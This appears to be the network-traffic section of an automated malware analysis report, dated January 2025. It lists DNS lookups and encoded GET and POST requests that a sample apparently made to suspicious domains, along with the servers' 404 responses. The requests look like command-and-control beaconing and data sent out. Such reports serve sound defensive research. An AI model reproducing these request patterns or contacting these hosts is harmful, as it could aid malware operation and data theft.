                Source: global trafficHTTP traffic detected: GET /mv7p/?QbUPL=5Xkb80UCbQYKeySJYU53mvY68yMkCwQR8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOHKQPM7koR8LGBXKy+yJDj5RRAPqEofhY8WnntYYNfZxpGMdCDiinSrfj&ef4=TJYXELnhFJhl HTTP/1.1Host: www.rtpterbaruwaktu3.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /cm9a/?ef4=TJYXELnhFJhl&QbUPL=AvN42DnS9Qw3kn1Ry3KvTJdIGYrzP5U8wu7Mj7dY/pRaa7659YJNcYiJunyE7nDkkRGZb81LCaJ1YXfnfuSvrBPGjvGvWTn9eE6YM8B8FSoiTH7Br/Ez7MnCgATlHy+hFK5SJ9epG9Mk HTTP/1.1Host: www.prhmcjdz.tokyoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6urf/?QbUPL=l+g0G83zvX30P9FhHqUPiCMCp3kC0CiGmxU2wY32UHo7SRAzM3NVc5Nn4wkj2AVHW/hBkkPychobZjIg4/uR7eoy7wVxfJ9K+U+MKKjLOsgjwrfTYLmZqfPCjIDk3pY25vWCr1O4NF+r&ef4=TJYXELnhFJhl HTTP/1.1Host: www.connecty.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /cpgr/?QbUPL=yUPZw4O96lKRgUDiLQ4YjgWex0ZVjKNUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjEi3gnykaux6zendXb1ybL2/XUTdEdLrQYsm3xUWbOyfaUl/C4vMGWlHL&ef4=TJYXELnhFJhl HTTP/1.1Host: www.tals.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /u9hy/?QbUPL=WqQro+xdjTeJIlGzWne5GtaANfF9lgg49rKxVxpmjgGfbhgcY6AAEIO8u8GwbvTJPVNB3UOdkxCDRvWF6atxJpdnDAzWn2dcKGou59R0p8ISVdotXCTwv0fS6r3BHVImiCcwST7dAbkv&ef4=TJYXELnhFJhl HTTP/1.1Host: www.50food.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.grandesofertas.fun
                Source: global trafficDNS traffic detected: DNS query: www.jijievo.site
                Source: global trafficDNS traffic detected: DNS query: www.ytsd88.top
                Source: global trafficDNS traffic detected: DNS query: www.bpgroup.site
                Source: global trafficDNS traffic detected: DNS query: www.fortevision.xyz
                Source: global trafficDNS traffic detected: DNS query: www.rtpterbaruwaktu3.xyz
                Source: global trafficDNS traffic detected: DNS query: www.prhmcjdz.tokyo
                Source: global trafficDNS traffic detected: DNS query: www.connecty.live
                Source: global trafficDNS traffic detected: DNS query: www.tals.xyz
                Source: global trafficDNS traffic detected: DNS query: www.50food.com
                Source: global trafficDNS traffic detected: DNS query: www.zriaraem-skiry.sbs
                Source: unknownHTTP traffic detected: POST /8qt7/ HTTP/1.1Host: www.ytsd88.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.ytsd88.topReferer: http://www.ytsd88.top/8qt7/Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 218User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36Data Raw: 51 62 55 50 4c 3d 49 72 71 4f 51 36 78 65 37 33 49 49 6a 4a 35 47 4f 77 79 67 74 72 66 53 59 47 51 6e 2f 72 46 61 4c 37 6b 71 6b 68 42 71 63 5a 36 43 39 62 31 44 65 59 45 6d 4b 44 66 52 75 79 63 32 57 77 45 67 76 37 46 6b 65 39 6b 5a 4a 6f 75 62 4c 47 5a 69 7a 6d 30 51 6a 4c 64 68 58 58 55 33 4e 49 62 45 51 53 47 51 6b 46 5a 66 61 55 34 66 6d 45 66 64 4d 58 49 6b 4a 53 50 42 5a 41 6b 42 56 4a 2b 4a 44 6e 4f 32 2b 4e 49 67 64 79 37 47 4c 4e 5a 46 54 74 4f 6a 2b 73 39 72 51 48 57 51 6e 42 36 66 66 2b 43 65 42 58 6a 46 53 71 6e 63 35 65 37 70 42 78 44 30 66 5a 39 74 78 51 70 77 72 4b 66 55 43 4b 2f 38 47 30 70 66 61 50 43 77 70 48 59 70 62 67 3d 3d Data Ascii: QbUPL=IrqOQ6xe73IIjJ5GOwygtrfSYGQn/rFaL7kqkhBqcZ6C9b1DeYEmKDfRuyc2WwEgv7Fke9kZJoubLGZizm0QjLdhXXU3NIbEQSGQkFZfaU4fmEfdMXIkJSPBZAkBVJ+JDnO2+NIgdy7GLNZFTtOj+s9rQHWQnB6ff+CeBXjFSqnc5e7pBxD0fZ9txQpwrKfUCK/8G0pfaPCwpHYpbg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 07:16:59 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 07:17:01 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 07:17:04 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 07:17:07 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 07:17:13 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 07:17:16 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 07:17:18 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
